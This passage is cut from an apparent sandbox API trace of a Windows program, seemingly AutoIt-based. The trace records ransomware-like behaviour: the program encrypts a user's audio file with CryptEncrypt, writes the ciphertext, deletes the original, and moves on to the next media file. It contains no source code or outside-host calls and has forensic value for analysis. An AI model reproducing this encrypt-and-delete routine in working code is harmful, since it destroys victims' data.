| out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0113.616] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0113.617] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0113.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cac58, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0113.618] CryptEncrypt (in: hKey=0x41ac540, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e2e0*=0xc499, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e2e0*=0xc4a0) returned 1 [0113.618] CharLowerBuffW (in: lpsz="byte[50337]", cchLength=0xb | out: lpsz="byte[50337]") returned 0xb [0113.669] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0113.669] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0113.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caf28, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0113.669] CryptEncrypt (in: hKey=0x41ac540, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x453ae08*, pdwDataLen=0x144e2e0*=0xc499, dwBufLen=0xc4a0 | out: pbData=0x453ae08*, pdwDataLen=0x144e2e0*=0xc4a0) returned 1 [0113.669] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0113.670] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0113.670] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0113.670] WriteFile (in: hFile=0x258, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0xc4a0, lpNumberOfBytesWritten=0x144ece4, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144ece4*=0xc4a0, lpOverlapped=0x0) returned 1 [0113.672] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0113.672] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0113.672] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0113.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca988, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0113.672] CryptDestroyKey (hKey=0x41ac540) returned 1 [0113.673] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0113.673] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0113.673] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0113.673] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0113.673] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0113.673] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0113.673] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0113.673] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0113.673] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0113.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796e08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0113.673] CryptReleaseContext (hProv=0x41a5360, dwFlags=0x0) returned 1 [0113.673] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0113.673] FreeLibrary (hLibModule=0x756e0000) returned 1 [0113.673] CloseHandle (hObject=0x298) returned 1 [0113.673] CloseHandle (hObject=0x258) returned 1 [0113.675] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\xavp\\fKGiw.wav", nBufferLength=0x7fff, lpBuffer=0x143ece0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\xavp\\fKGiw.wav", lpFilePart=0x0) returned 0x30 [0113.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e4f0 [0113.675] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\xavp\\fKGiw.wav" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u\\xavp\\fkgiw.wav")) returned 0x20 [0113.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0113.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0113.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0113.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0113.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0113.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0113.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0113.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0113.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0113.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0113.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431d8c0 [0113.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369f80 [0113.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a3a0 [0113.676] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\xavp\\fKGiw.wav", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x524dd610, ftCreationTime.dwHighDateTime=0x1d5ed5a, ftLastAccessTime.dwLowDateTime=0x867c25b0, ftLastAccessTime.dwHighDateTime=0x1d5e538, ftLastWriteTime.dwLowDateTime=0x867c25b0, ftLastWriteTime.dwHighDateTime=0x1d5e538, nFileSizeHigh=0x0, nFileSizeLow=0xc499, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="fKGiw.wav", cAlternateFileName="")) returned 0x41ac2c0 [0113.676] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\xavp\\fKGiw.wav" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u\\xavp\\fkgiw.wav")) returned 1 [0113.732] FindNextFileW (in: hFindFile=0x41ac2c0, lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x524dd610, ftCreationTime.dwHighDateTime=0x1d5ed5a, ftLastAccessTime.dwLowDateTime=0x867c25b0, ftLastAccessTime.dwHighDateTime=0x1d5e538, ftLastWriteTime.dwLowDateTime=0x867c25b0, ftLastWriteTime.dwHighDateTime=0x1d5e538, nFileSizeHigh=0x0, nFileSizeLow=0xc499, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="fKGiw.wav", cAlternateFileName="")) returned 0 [0113.732] FindClose (in: hFindFile=0x41ac2c0 | out: hFindFile=0x41ac2c0) returned 1 [0113.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a3a0 | out: hHeap=0x1780000) returned 1 [0113.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0113.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0113.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0113.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e4f0 | out: hHeap=0x1780000) returned 1 [0113.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0113.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0113.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0113.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0113.733] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0113.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0113.733] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0113.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0113.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0113.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0113.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0113.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0113.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0113.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0113.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0113.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0113.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19d20a8 | out: hHeap=0x1780000) returned 1 [0113.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0113.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0113.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0113.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0113.733] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0113.734] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0113.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0113.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0113.734] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0113.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0113.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0113.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0113.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25b0 [0113.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0113.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0113.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0113.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0113.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0113.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0113.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0113.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0113.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369c10 [0113.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0113.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0113.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0113.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0113.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe0) returned 0x19e5358 [0113.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369c10 | out: hHeap=0x1780000) returned 1 [0113.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0113.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0113.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0113.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0113.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca448 [0113.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0113.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0113.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0113.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0113.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0113.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0113.735] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0113.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0113.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0113.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0113.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0113.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0113.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0113.735] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0113.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0113.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0113.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0113.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0113.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0113.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0113.735] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\xavp\\WC8LUkBjI.mp3", lpFindFileData=0x144ebc8 | out: lpFindFileData=0x144ebc8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab951be0, ftCreationTime.dwHighDateTime=0x1d5eb73, ftLastAccessTime.dwLowDateTime=0xf77c4470, ftLastAccessTime.dwHighDateTime=0x1d5ee48, ftLastWriteTime.dwLowDateTime=0xf77c4470, ftLastWriteTime.dwHighDateTime=0x1d5ee48, nFileSizeHigh=0x0, nFileSizeLow=0x8156, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="WC8LUkBjI.mp3", cAlternateFileName="WC8LUK~1.MP3")) returned 0x41ac600 [0113.735] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0113.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0113.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0113.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0113.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0113.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0113.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0113.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c78 [0113.736] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0113.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c78 | out: hHeap=0x1780000) returned 1 [0113.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0113.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0113.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2560 [0113.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0113.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0113.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0113.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0113.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0113.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca2f8 [0113.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0113.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0113.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0113.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0113.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0113.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0113.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0113.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0113.736] PeekMessageW (in: lpMsg=0x144ec64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec64) returned 0 [0113.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0113.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0113.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0113.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0113.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0113.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0113.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0113.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0113.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0113.737] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0113.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0113.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0113.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0113.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26c0 [0113.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0113.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0113.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0113.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0113.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0113.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25f0 [0113.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0113.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0113.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0113.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2620 [0113.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0113.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0113.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0113.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca430 [0113.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0113.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0113.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0113.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0113.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0113.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0113.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0113.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0113.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0113.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0113.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0113.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0113.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0113.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0113.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0113.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0113.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0113.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0113.738] 